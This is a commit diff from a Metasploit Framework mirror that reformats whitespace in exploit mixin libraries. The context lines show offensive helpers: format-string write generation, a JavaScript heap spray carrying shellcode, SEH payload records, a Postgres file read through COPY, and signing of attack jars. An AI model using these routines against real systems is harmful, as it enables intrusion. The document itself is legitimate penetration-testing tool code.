infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

tidy pass on exploit mixins 

git-svn-id: file:///home/svn/framework3/trunk@10487 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-09-26 21:02:00 +00:00
parent e4bef2ce51
commit f07f354472
20 changed files with 273 additions and 276 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

66
lib/msf/core/exploit/arkeia.rb
View File

@ -8,9 +8,9 @@ module Msf
#
###
module Exploit::Remote::Arkeia
include Exploit::Remote::Tcp
#
# Creates an instance of a MSSQL exploit module.
#
@ -26,8 +26,8 @@ module Exploit::Remote::Arkeia
self.recv_buff = ''
end
#
# Flush the receive buffer on a new connection
#
@ -35,13 +35,13 @@ module Exploit::Remote::Arkeia
super
self.recv_buff = ''
end
#
# This method dumps some information about the service
#
def arkeia_info
connect
info = { }
resp = ''
@ -63,14 +63,14 @@ module Exploit::Remote::Arkeia
"\x00\x34\x2e\x33\x2e\x30\x2d\x31"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00"
sock.put(req)
resp = arkeia_recv()
if !(resp and resp[0,4] == "\x00\x60\x00\x04")
disconnect
return false
end
# Authenticate2
req =
"\x00\x73\x00\x00\x00\x00\x00\x0c" +
@ -82,22 +82,22 @@ module Exploit::Remote::Arkeia
if !(resp and resp[0,4] == "\x00\x60\x00\x04")
disconnect
return false
end
end
# SessionSetup1
req =
req =
"\x00\x61\x00\x04\x00\x01\x00\x15"+
"\x00\x00\x31\x35\x33\x39\x38\x00"+
"\x45\x4e\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00"
sock.put(req)
resp = arkeia_recv()
if !(resp and resp[0,4] == "\x00\x43\x00\x00")
disconnect
return false
end
# Begin the ARKADMIN_GET_CLIENT_INFO request
req =
"\x00\x62\x00\x01\x00\x02\x00\x25"+
@ -106,33 +106,33 @@ module Exploit::Remote::Arkeia
"\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+
"\x00\x32\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00"
sock.put(req)
resp = arkeia_recv()
if !(resp and resp[0,4] == "\x00\x43\x00\x00")
disconnect
return false
end
end
# Complete the ARKADMIN_GET_CLIENT_INFO request
req =
"\x00\x63\x00\x04\x00\x03\x00\x11"+
"\x30\x00\x31\x00\x32\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"
sock.put(req)
sock.put(req)
1.upto(5) { |i|
resp = arkeia_recv()
break if not resp
break if resp =~ /VERSION/
}
if !(resp and resp =~ /VERSION/)
disconnect
return false
end
# Store the version information
mver = resp.match(/IVERSION\x00([^\x00]+)/)
info['Version'] = mver[1] if mver
@ -140,7 +140,7 @@ module Exploit::Remote::Arkeia
# Store the hostname information
mver = resp.match(/ISERVNAME\x00([^\x00]+)/)
info['Hostname'] = mver[1] if mver
# Begin the ARKADMIN_GET_MACHINE_INFO request
req =
"\x00\x62\x00\x01\x00\x02\x00\x26"+
@ -149,7 +149,7 @@ module Exploit::Remote::Arkeia
"\x48\x49\x4e\x45\x5f\x49\x4e\x46"+
"\x4f\x00\x33\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00"
sock.put(req)
1.upto(5) { |i|
resp = arkeia_recv()
@ -159,15 +159,15 @@ module Exploit::Remote::Arkeia
if !(resp and resp[0,2] == "\x00\x43")
disconnect
return info
end
end
# Complete the ARKADMIN_GET_MACHINE_INFO request
req =
"\x00\x63\x00\x04\x00\x03\x00\x11"+
"\x30\x00\x31\x00\x33\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"
sock.put(req)
1.upto(5) { |i|
resp = arkeia_recv()
@ -177,7 +177,7 @@ module Exploit::Remote::Arkeia
if !(resp and resp[0,2] == "\x00\x69")
disconnect
return info
end
end
# Finally, parse out and store all the parameters
resp.split("TPVALUE\x00").each { |x|
@ -186,11 +186,11 @@ module Exploit::Remote::Arkeia
info[ minf[2] ] = minf[1]
end
}
disconnect
return info
end
#
# This method reads from the socket and parses out a single
# arkeia response, buffering the rest
@ -203,19 +203,19 @@ module Exploit::Remote::Arkeia
if (self.recv_buff.length < 8)
return false
end
# Read the length header out of the message
dlen = self.recv_buff[6, 2].unpack('n')[0]
# Do we have the entire response message?
if (self.recv_buff.length >= dlen + 8)
return self.recv_buff.slice!(0, dlen + 8)
end
return false
end
attr_accessor :recv_buff
end
end

2
lib/msf/core/exploit/browser_autopwn.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/

18
lib/msf/core/exploit/brute.rb
View File

@ -47,7 +47,7 @@ module Exploit::Brute
stop = bf.stop_addresses ? bf.stop_addresses.dup : {}
step = bf.step_size
delay = bf.delay
# Enumerate each start address and try to figure out the direction
start.each_pair { |name, addr|
# If there's a stop address, figure out if it's above or below
@ -64,7 +64,7 @@ module Exploit::Brute
direction[name] = bf.default_direction
end
}
# Import start/stop address overrides from the datastore
import_from_datastore(start, 'Start')
import_from_datastore(stop, 'Stop')
@ -101,7 +101,7 @@ module Exploit::Brute
# Stop brute forcing once a session is found
break if session_created?
# Fire off an exploit attempt with the supplied addresses
brute_exploit(curr)
@ -119,16 +119,16 @@ module Exploit::Brute
# we're going to go over
next_addr = step * direction[k]
# If this item has hit a stop address, add it to the stopped
# If this item has hit a stop address, add it to the stopped
# hash and move it no further
if (stop[k])
if ((direction[k] == 1 and curr[k] + next_addr >= stop[k]) or
(direction[k] == -1 and curr[k] + next_addr < stop[k]))
(direction[k] == -1 and curr[k] + next_addr < stop[k]))
stopped << k
next
end
end
# If it's not time to stop, move it
curr[k] += next_addr
}
@ -141,7 +141,7 @@ module Exploit::Brute
#
# This routine is called once per brute force iteration. The addresses
# parameter is a hash of addresses that are incremented each iteration and
# are derived from the target's bruteforce information or the module's
# are derived from the target's bruteforce information or the module's
# datastore in case they are being overriden.
#
def brute_exploit(addrs)
@ -164,8 +164,8 @@ protected
#
# Imports information into the supplied hash from the datastore.
# This is a way of allowing the user to override values for a
# specific brute force target by name without them actually
# This is a way of allowing the user to override values for a
# specific brute force target by name without them actually
# being conveyed in the options list. This is a bit of a change
# from 2.x, but 2.x didn't have per-target brute force
# addresses, which I think is more valuable.

4
lib/msf/core/exploit/db2.rb
View File

@ -28,10 +28,10 @@ module Exploit::Remote::DB2
], Msf::Exploit::Remote::DB2)
end
#
# This method sends a TCP query packet to the server, using
# datastore options and parses out the reply packet
# datastore options and parses out the reply packet
# into a hash
#
def db2_probe(timeout=5)

14
lib/msf/core/exploit/dect_coa.rb
View File

@ -52,7 +52,7 @@ module Exploit::DECT_COA
close_coa if self.dect_device
begin
self.dect_device = File.open(datastore['INTERFACE'], "w+")
self.dect_device = File.open(datastore['INTERFACE'], "wb+")
rescue ::Exception => e
print_error("Could not open the Com-On-Air device at #{datastore['INTERFACE']}")
print_error("This module only works on Linux with the appropriate hardware and driver, while running as root")
@ -139,13 +139,13 @@ module Exploit::DECT_COA
when DECT_BAND_BOTH
if (channel < 9)
set_channel(channel + 1)
set_channel(channel + 1)
elsif (channel == 9)
set_channel(23)
set_channel(23)
elsif (channel > 9 && channel < 27)
set_channel(channel + 1)
set_channel(channel + 1)
else
set_channel(0)
set_channel(0)
end
end
end
@ -173,7 +173,7 @@ module Exploit::DECT_COA
end
def parse_call(data)
{
{
'channel' => data[0],
'rssi' => data[1],
'rfpi_raw' => data[2,5],
@ -183,7 +183,7 @@ module Exploit::DECT_COA
def record_coa(filename)
raise RuntimeError, "DECT call recording is not supported yet"
fd = File.open(filename, 'rw')
fd = File.open(filename, 'rb+')
fd.close
end

16
lib/msf/core/exploit/dialup.rb
View File

@ -22,24 +22,24 @@ module Exploit::Remote::Dialup
], self.class)
deregister_options('RHOST')
begin
require 'telephony'
@telephony_loaded = true
rescue ::Exception => e
@telephony_loaded = false
@telephony_error = e
end
end
end
# Opens the modem connection
def connect_dialup(global = true, opts={})
if (not @telephony_loaded)
print_status("The serialport module is not available: #{telephony_error}")
raise RuntimeError, "Telephony not available"
end
serialport = datastore['SERIALPORT']
baud = datastore['BAUDRATE'].to_i
data_bits = datastore['DATABITS'].to_i
@ -57,7 +57,7 @@ module Exploit::Remote::Dialup
when 'Both' ; Telephony::Modem::HARD | Telephony::Modem::SOFT
else Telephony::Modem::NONE
end
initstring = datastore['INITSTRING']
dialprefix = datastore['DIALPREFIX']
dialsuffix = datastore['DIALSUFFIX']
@ -108,7 +108,7 @@ module Exploit::Remote::Dialup
end
end
# Closes the modem connection
# Closes the modem connection
def disconnect_dialup(nmodem = self.modem)
if(nmodem)
nmodem.flush
@ -136,7 +136,7 @@ module Exploit::Remote::Dialup
while c
c = self.modem.getc
res[:buffer] += c.chr if c
end
end
return res
end
end
@ -181,7 +181,7 @@ module Exploit::Remote::Dialup
return rv
end
attr_accessor :modem
end

90
lib/msf/core/exploit/fmtstr.rb
View File

@ -16,12 +16,12 @@ module Exploit::FormatString
#
def initialize(info = {})
super
@use_fpu = false
@use_dpa = false
end
#
# Allow caller to override the capabilities
#
@ -29,7 +29,7 @@ module Exploit::FormatString
@use_fpu = fpu
@use_dpa = dpa
end
#
# Detect the capabilities (only works for non-blind)
#
@ -38,7 +38,7 @@ module Exploit::FormatString
@use_fpu = fmtstr_detect_cap_fpu
#print_status("support dpa:#{@use_dpa.to_s}, fpu:#{@use_fpu.to_s}")
end
def fmtstr_detect_cap_dpa
res = trigger_fmt("|%1$08x|")
return nil if not res
@ -48,7 +48,7 @@ module Exploit::FormatString
end
return false
end
def fmtstr_detect_cap_fpu
res = trigger_fmt("|%g|")
return nil if not res
@ -58,7 +58,7 @@ module Exploit::FormatString
end
return false
end
def fmtstr_detect_vulnerable
res = trigger_fmt("|%08x|")
return false if not res
@ -68,7 +68,7 @@ module Exploit::FormatString
end
return false
end
# NOTE: This will likely crash the target process
def fmtstr_detect_exploitable
begin
@ -83,40 +83,40 @@ module Exploit::FormatString
end
return false
end
#
# Generates a format string that will perform an arbitrary write using
# two separate short values
#
def generate_fmt_two_shorts(num_printed, write_to, write_what, targ = target)
arr = Array.new
arr << [ write_what & 0xffff, write_to ]
arr << [ write_what >> 16, write_to + 2 ]
stuff = fmtstr_gen_from_array(num_printed, arr, targ)
end
#
# Generates a format string that will perform an arbitrary write using
# two separate short values
#
def generate_fmtstr_from_buf(num_printed, write_to, buffer, targ = target)
# break buffer into shorts
arr = fmtstr_gen_array_from_buf(write_to, buffer, targ)
# now build the format string in its entirety
stuff = fmtstr_gen_from_array(num_printed, arr, targ)
end
#
# Generates and returns an array of what/where pairs from the supplied buffer
#
def fmtstr_gen_array_from_buf(write_to, buffer, targ = target)
# break buffer into shorts
arr = Array.new
off = 0
@ -128,13 +128,13 @@ module Exploit::FormatString
tb = buffer[off,2].unpack('v')[0].to_i
#print_status("%d %d %d" % [off,buffer.length,tb])
addr = write_to + off
arr << [ tb, addr ]
off += 2
end
return arr
end
#
# Generates a format string from an array of value/address pairs
#
@ -144,7 +144,7 @@ module Exploit::FormatString
# sort the array -- for optimization
arr = arr.sort { |x,y| x[0] <=> y[0] }
# build up the addrs and fmts buffers
fmts = ""
addrs = ""
@ -152,18 +152,18 @@ module Exploit::FormatString
arr.each do |el|
# find out how much to advance the column value
prec = fmtstr_target_short(el[0], num)
# for non-dpa, if the prec is more than 8, we need something to pop
if not @use_dpa and prec >= 8
addrs << rand_text(4)
end
# write here!
addrs << [el[1]].pack('V')
# put our advancement fmt (or bytes)
fmts << fmtstr_advance_count(prec)
# fmt to cause the write :)
if @use_dpa
fmts << "%" + num_pops.to_s + "$hn"
@ -171,11 +171,11 @@ module Exploit::FormatString
else
fmts << "%hn"
end
# update written count
num = el[0]
end
# make sure we dont have bad characters ...
if (bad_idx = has_badchars?(addrs, payload_badchars))
raise BadcharError.new(addrs, bad_idx, addrs.length, addrs[bad_idx]),
@ -190,16 +190,16 @@ module Exploit::FormatString
stuff << "%8x" * num_pops
end
stuff << fmts
return stuff
end
#
# Count how many bytes will print before we reach the writing..
#
def fmtstr_count_printed(num_printed, num_pad, num_pops, arr)
num = num_printed + num_pad
if not @use_dpa
num += (8 * num_pops)
@ -211,43 +211,43 @@ module Exploit::FormatString
if not @use_dpa and prec >= 8
num += 4
end
# account for the addr to write to
num += 4
npr = el[0]
end
return num
end
#
# Generate the number to be used for precision that will create
# the specified value to write
#
#
def fmtstr_target_short(value, num_printed)
if value < num_printed
return (0x10000 - num_printed) + value
end
return value - num_printed
end
#
# Generate a fmt that will advance the printed count by the specified amount
#
def fmtstr_advance_count(prec)
# no need to advance :)
return "" if prec == 0
# asumming %x max normal length is 8...
if prec >= 8
return "%0" + prec.to_s + "x"
end
# anything else, we just put some chars in...
return rand_text(prec)
end
#
# Returns the index of any bad characters found in the supplied buffer.
# (NOTE: copied from encoder.rb)
@ -263,7 +263,7 @@ module Exploit::FormatString
return nil
end
#
# Read a single 32-bit integer from the stack at the specified offset
#
@ -271,7 +271,7 @@ module Exploit::FormatString
# cant read offset 0!
return nil if offset < 1
fmt = ''
fmt << extra
if @use_dpa
@ -286,14 +286,14 @@ module Exploit::FormatString
fmt << "|"
fmt << "%x"
end
res = trigger_fmt(fmt)
return res if not res
numstr = extract_fmt_output(res)
dw = numstr.split('|')[1].to_i(16)
end
end
end

11
lib/msf/core/exploit/http/client.rb
View File

@ -88,8 +88,8 @@ module Exploit::Remote::HttpClient
#
def validate_fingerprint()
# Don't bother checking if there's no database active.
if (framework.db.active and
datastore['FingerprintCheck'] and
if (framework.db.active and
datastore['FingerprintCheck'] and
self.class.const_defined?('HttpFingerprint'))
# Get the module-specific config
opts = self.class.const_get('HttpFingerprint')
@ -180,16 +180,15 @@ module Exploit::Remote::HttpClient
#
def handler(nsock = nil)
# If no socket was provided, try the global one.
if ((!nsock) and
(self.client))
if ((!nsock) and (self.client))
nsock = self.client.conn
end
# If the parent claims the socket associated with the HTTP client, then
# we rip the socket out from under the HTTP client.
if (((rv = super(nsock)) == Handler::Claimed) and
(self.client) and
(nsock == self.client.conn))
(self.client) and
(nsock == self.client.conn))
self.client.conn = nil
end

24
lib/msf/core/exploit/http/server.rb
View File

@ -590,20 +590,20 @@ protected
def js_heap_spray
js = %Q|var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}
|
opts = {

6
lib/msf/core/exploit/ip.rb
View File

@ -24,7 +24,7 @@ module Exploit::Remote::Ip
# Creates an IP socket for communicating with a remote host
#
def connect_ip(global = true, opts={})
begin
nsock = Rex::Socket::Ip.create(
'Context' =>
@ -66,12 +66,12 @@ module Exploit::Remote::Ip
if (nsock == ip_sock)
self.ip_sock = nil
end
# Remove this socket from the list of sockets created by this exploit
remove_socket(nsock)
end
#
#
# Claims the IP socket if the payload so desires.
# No exploits use raw socket payloads yet...
#

64
lib/msf/core/exploit/java.rb
View File

@ -19,11 +19,11 @@ module Exploit::Java
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'JavaCache', [true, 'Java cache location',
File.join(Msf::Config.config_directory, "javacache")]),
OptString.new( 'JavaCache', [true, 'Java cache location',
File.join(Msf::Config.config_directory, "javacache")]),
OptString.new( 'AddClassPath', [false, 'Additional java classpath', nil]),
], self.class)
@ -53,14 +53,14 @@ module Exploit::Java
@jvm_init = true
end
def query_jvm
return @jvmInit
end
def save_to_file(classnames, codez, location)
path = File.join( Msf::Config.install_root, "external", "source", location )
if not File.exists? path
Dir.mkdir(path)
end
@ -68,7 +68,7 @@ module Exploit::Java
i = 0
classnames.each { |fil|
file = File.join( path, fil + ".java")
fp = File.open( file, "w" )
fp = File.open( file, "wb" )
print_status "Writing #{fil} to " + file
fp.puts codez[i]
i += 1
@ -80,34 +80,34 @@ module Exploit::Java
if !@rjb_loaded or !@jvm_init
raise RuntimeError, "Could not load rjb and/or the JVM: " + @java_error.to_s
end
if compile_options.class.to_s != "Array" && compile_options
raise RuntimeError, "Compiler options must be of type Array."
end
compile_options = [] if compile_options.nil?
# Create the directory if it doesn't exist
Dir.mkdir(datastore['JavaCache']) if !File.exists? datastore['JavaCache']
# For compatibility, some exploits need to have the target and source version
# set to a previous JRE version.
std_compiler_opts = [ "-target", "1.3", "-source", "1.3", "-d", datastore['JavaCache'] ]
compile_options += std_compiler_opts
java_compiler_klass = Rjb::import('javaCompile.CompileSourceInMemory')
# If we were passed arrays
if classnames.class == [].class && codez.class == [].class
# default compile class
begin
# Sames as java_compiler_klass.CompileFromMemory( String[] classnames,
# Sames as java_compiler_klass.CompileFromMemory( String[] classnames,
# String[] codez, String[] compilerOptions)
success = java_compiler_klass._invoke('CompileFromMemory',
# Signature explained: [ means array, Lpath.to.object; means object
# Thus, this reads as call the method with 3 String[] args.
'[Ljava.lang.String;[Ljava.lang.String;[Ljava.lang.String;',
'[Ljava.lang.String;[Ljava.lang.String;[Ljava.lang.String;',
classnames, codez, compile_options)
rescue Exception => e
print_error "Received unknown error: " + e
@ -116,10 +116,10 @@ module Exploit::Java
raise RuntimeError, "The Java mixin received unknown argument-type combinations and cannot continue."
end
if !success
raise RuntimeError, "Compile failed."
raise RuntimeError, "Compile failed."
end
end
def build_jar(output_jar, in_files)
if output_jar.class != "".class || in_files.class != [].class
raise RuntimeError, "Building a jar requires an output_jar and an Array of in_files."
@ -127,7 +127,7 @@ module Exploit::Java
# Add paths
in_files = in_files.map { |file| File.join(datastore['JavaCache'], file) }
create_jar_klass = Rjb::import('javaCompile.CreateJarFile')
file_class = Rjb::import('java.io.File')
@ -141,8 +141,8 @@ module Exploit::Java
#
# http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf
#
def sign_jar(cert_cn, unsiged_jar, signed_jar, cert_alias="signFiles", msf_keystore="msfkeystore",
msf_store_pass="msfstorepass", msf_key_pass="msfkeypass")
def sign_jar(cert_cn, unsiged_jar, signed_jar, cert_alias="signFiles", msf_keystore="msfkeystore",
msf_store_pass="msfstorepass", msf_key_pass="msfkeypass")
# Dependent on $JAVA_HOME/lib/tools.jar that comes with the JDK.
signer_klass = Rjb::import('javaCompile.SignJar')
@ -150,29 +150,33 @@ module Exploit::Java
# Check if the keystore exists from previous run. If it does, delete it.
msf_keystore = File.join(datastore['JavaCache'], msf_keystore)
File.delete msf_keystore if File.exists? msf_keystore
# Rjb pukes on a CN with a comma in it so bad that it crashes to shell
# and turns input echoing off. Simple fix for this ugly bug is
# just to get rid of commas which kinda sucks but whatever. See #1543.
keytool_opts = ["-genkey", "-alias", cert_alias, "-keystore", msf_keystore,
"-storepass", msf_store_pass, "-dname", "CN=#{cert_cn.gsub(",",'')}",
"-keypass", "msfkeypass"]
keytool_opts = [
"-genkey", "-alias", cert_alias, "-keystore", msf_keystore,
"-storepass", msf_store_pass, "-dname", "CN=#{cert_cn.gsub(",",'')}",
"-keypass", "msfkeypass"
]
# Build the cert keystore
signer_klass._invoke('KeyToolMSF','[Ljava.lang.String;',keytool_opts)
jarsigner_opts = ["-keystore", msf_keystore, "-storepass", msf_store_pass,
"-keypass", msf_key_pass, "-signedJar",
File.join(datastore['JavaCache'], signed_jar), # Signed Jar
File.join(datastore['JavaCache'], unsiged_jar), # Input Jar we're signing
cert_alias] # The cert we're using
jarsigner_opts = [
"-keystore", msf_keystore, "-storepass", msf_store_pass,
"-keypass", msf_key_pass, "-signedJar",
File.join(datastore['JavaCache'], signed_jar), # Signed Jar
File.join(datastore['JavaCache'], unsiged_jar), # Input Jar we're signing
cert_alias # The cert we're using
]
signer_klass._invoke('JarSignerMSF','[Ljava.lang.String;',jarsigner_opts)
# There are warnings in the source for KeyTool/JarSigner warning that security providers
# are not released, and if you are calling .main(foo) from another app, you need to release
# them manually. This is not done here, and should Rjb be used for anything in the future,
# this may need to be cleaned up.
end
end
end

10
lib/msf/core/exploit/kernel_mode.rb
View File

@ -26,7 +26,7 @@ module Exploit::KernelMode
end
protected
#
# Encapsulates the supplied raw payload within a kernel-mode payload.
#
@ -35,22 +35,22 @@ protected
ext_opt = reqs['ExtendedOptions'] || {}
# Prepend and append any buffers that were specified in the extended
# options. This can be used do perform stack adjustments and other
# options. This can be used do perform stack adjustments and other
# such things against the user-mode payload rather than the
# encapsulating payload.
raw =
raw =
(ext_opt['PrependUser'] || '') +
raw +
(ext_opt['AppendUser'] || '')
# If this is a win32 target platform, try to encapsulate it in a
# If this is a win32 target platform, try to encapsulate it in a
# win32 kernel-mode payload.
if target_platform.supports?(Msf::Module::PlatformList.win32)
ext_opt['UserModeStub'] = raw
new_raw = Rex::Payloads::Win32::Kernel.construct(ext_opt)
end
# If we did not generate a new payload, then something broke.
if new_raw.nil?
raise RuntimeError, "Could not encapsulate payload in kernel-mode payload"

10
lib/msf/core/exploit/pdf_parse.rb Executable file → Normal file
View File

@ -6,9 +6,7 @@
###
module Msf
module Exploit::PDF_Parse
module Exploit::PDF_Parse
def initialize(info = {})
super
@ -248,10 +246,8 @@ module Msf
end
end
return xref_trailers, trailers, startxrefs, root_obj
return xref_trailers, trailers, startxrefs, root_obj
end
end
end
end

6
lib/msf/core/exploit/pop2.rb
View File

@ -11,7 +11,7 @@ require 'msf/core/exploit/tcp'
module Exploit::Remote::Pop2
include Exploit::Remote::Tcp
#
# Creates an instance of an POP2 exploit module.
#
@ -37,7 +37,7 @@ module Exploit::Remote::Pop2
print_status("Connecting to POP2 server #{rhost}:#{rport}...")
fd = super
# Wait for a banner to arrive...
self.banner = fd.get_once
@ -49,7 +49,7 @@ module Exploit::Remote::Pop2
end
#
# Connect and login to the remote POP2 server using the credentials
# Connect and login to the remote POP2 server using the credentials
# that have been supplied in the exploit options.
#
def connect_login(global = true)

22
lib/msf/core/exploit/postgres.rb
View File

@ -54,7 +54,7 @@ module Exploit::Remote::Postgres
uri = "tcp://#{ip}:#{port}"
verbose = args[:verbose] || datastore['VERBOSE']
begin
self.postgres_conn = Connection.new(db,username,password,uri)
self.postgres_conn = Connection.new(db,username,password,uri)
rescue RuntimeError => e
case e.to_s.split("\t")[1]
when "C3D000"
@ -63,14 +63,14 @@ module Exploit::Remote::Postgres
when "C28000"
print_error "#{ip}:#{port} Postgres - Invalid username or password: '#{username}':'#{password}'" if verbose
return :error_credentials
else
else
print_error "#{ip}:#{port} Postgres - Error: #{e.inspect}" if verbose
return :error
end
end
if self.postgres_conn
print_good "#{ip}:#{port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose
return :connected
return :connected
end
end
@ -83,7 +83,7 @@ module Exploit::Remote::Postgres
self.postgres_conn.close if(self.postgres_conn.kind_of?(Connection) && self.postgres_conn.instance_variable_get("@conn"))
self.postgres_conn = nil
end
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
end
# If not currently connected, postgres_query will attempt to connect. If an
@ -97,7 +97,7 @@ module Exploit::Remote::Postgres
unless self.postgres_conn
return {:conn_error => true}
end
if self.postgres_conn
if self.postgres_conn
sql ||= datastore['SQL']
print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE']
begin
@ -117,7 +117,7 @@ module Exploit::Remote::Postgres
end
return {:sql_error => sql_error_msg}
end
postgres_print_reply(resp,sql) if doprint
postgres_print_reply(resp,sql) if doprint
return {:complete => resp}
end
end
@ -158,14 +158,14 @@ module Exploit::Remote::Postgres
uri = "tcp://#{rhost}:#{rport}"
verbose = args[:verbose] || datastore['VERBOSE']
begin
self.postgres_conn = Connection.new(db,username,password,uri)
self.postgres_conn = Connection.new(db,username,password,uri)
rescue RuntimeError => e
version_hash = analyze_auth_error e
return version_hash
return version_hash
end
if self.postgres_conn # Just ask for the version.
resp = postgres_query("select version()",false)
ver = resp[:complete].rows[0][0]
ver = resp[:complete].rows[0][0]
return {:auth => ver}
end
end
@ -229,7 +229,7 @@ module Exploit::Remote::Postgres
end
def postgres_password
if datastore['PASSWORD'].to_s.size > 0
if datastore['PASSWORD'].to_s.size > 0
datastore['PASSWORD'].to_s
else
Rex::Text.rand_text_english(rand(6)+2)
@ -246,7 +246,7 @@ module Exploit::Remote::Postgres
end
temp_table_name = Rex::Text.rand_text_alpha(rand(10)+6)
read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
COPY #{temp_table_name} FROM '#{filename}';
SELECT * FROM #{temp_table_name}}
read_return = postgres_query(read_query,true)

12
lib/msf/core/exploit/seh.rb
View File

@ -3,7 +3,7 @@ require 'rex/exploitation/seh'
module Msf
###
#
#
# This mixin provides an interface to generating SEH registration records in a
# robust fashion using the Rex::Exploitation::Seh class.
#
@ -38,7 +38,7 @@ module Exploit::Seh
# random padding. This should be derived from the maximum amount of
# space available to the exploit for payloads minus the current payload
# size.
#
#
def generate_seh_record(handler, opts = {})
seh = Rex::Exploitation::Seh.new(
payload_badchars,
@ -48,12 +48,12 @@ module Exploit::Seh
# Generate the record
seh.generate_seh_record(handler, datastore['DynamicSehRecord'])
end
def generate_seh_payload(handler, opts = {})
# The boilerplate this replaces always has 8 bytes for seh + addr
seh_space = 8 + payload.nop_sled_size
seh = Rex::Exploitation::Seh.new(
payload_badchars,
seh_space,
@ -61,7 +61,7 @@ module Exploit::Seh
# Generate the record
rec = seh.generate_seh_record(handler, datastore['DynamicSehRecord'])
# Append the payload, minus the nop sled that we replaced
rec << payload.encoded.slice(payload.nop_sled_size, payload.encoded.length)
end

2
lib/msf/core/exploit/sunrpc.rb
View File

@ -150,7 +150,7 @@ module Exploit::Remote::SunRPC
def progresolv(number)
names = File.join(Msf::Config.install_root, "data", "wordlists", "rpc_names.txt")
File.open(names,"r").each_line do |line|
File.open(names, "rb").each_line do |line|
next if line.empty? || line =~ /^\s*#/
if line =~ /^(\S+?)\s+(\d+)/ && number == $2.to_i

148
lib/msf/core/exploit/telnet.rb
View File

@ -13,74 +13,74 @@ module Exploit::Remote::Telnet
include Exploit::Remote::Tcp
# Borrowing constants from Ruby's Net::Telnet class (ruby license)
IAC = 255.chr # "\377" # "\xff" # interpret as command
DONT = 254.chr # "\376" # "\xfe" # you are not to use option
DO = 253.chr # "\375" # "\xfd" # please, you use option
WONT = 252.chr # "\374" # "\xfc" # I won't use option
WILL = 251.chr # "\373" # "\xfb" # I will use option
SB = 250.chr # "\372" # "\xfa" # interpret as subnegotiation
GA = 249.chr # "\371" # "\xf9" # you may reverse the line
EL = 248.chr # "\370" # "\xf8" # erase the current line
EC = 247.chr # "\367" # "\xf7" # erase the current character
AYT = 246.chr # "\366" # "\xf6" # are you there
AO = 245.chr # "\365" # "\xf5" # abort output--but let prog finish
IP = 244.chr # "\364" # "\xf4" # interrupt process--permanently
BREAK = 243.chr # "\363" # "\xf3" # break
DM = 242.chr # "\362" # "\xf2" # data mark--for connect. cleaning
NOP = 241.chr # "\361" # "\xf1" # nop
SE = 240.chr # "\360" # "\xf0" # end sub negotiation
EOR = 239.chr # "\357" # "\xef" # end of record (transparent mode)
ABORT = 238.chr # "\356" # "\xee" # Abort process
SUSP = 237.chr # "\355" # "\xed" # Suspend process
EOF = 236.chr # "\354" # "\xec" # End of file
SYNCH = 242.chr # "\362" # "\xf2" # for telfunc calls
IAC = 255.chr # "\377" # "\xff" # interpret as command
DONT = 254.chr # "\376" # "\xfe" # you are not to use option
DO = 253.chr # "\375" # "\xfd" # please, you use option
WONT = 252.chr # "\374" # "\xfc" # I won't use option
WILL = 251.chr # "\373" # "\xfb" # I will use option
SB = 250.chr # "\372" # "\xfa" # interpret as subnegotiation
GA = 249.chr # "\371" # "\xf9" # you may reverse the line
EL = 248.chr # "\370" # "\xf8" # erase the current line
EC = 247.chr # "\367" # "\xf7" # erase the current character
AYT = 246.chr # "\366" # "\xf6" # are you there
AO = 245.chr # "\365" # "\xf5" # abort output--but let prog finish
IP = 244.chr # "\364" # "\xf4" # interrupt process--permanently
BREAK = 243.chr # "\363" # "\xf3" # break
DM = 242.chr # "\362" # "\xf2" # data mark--for connect. cleaning
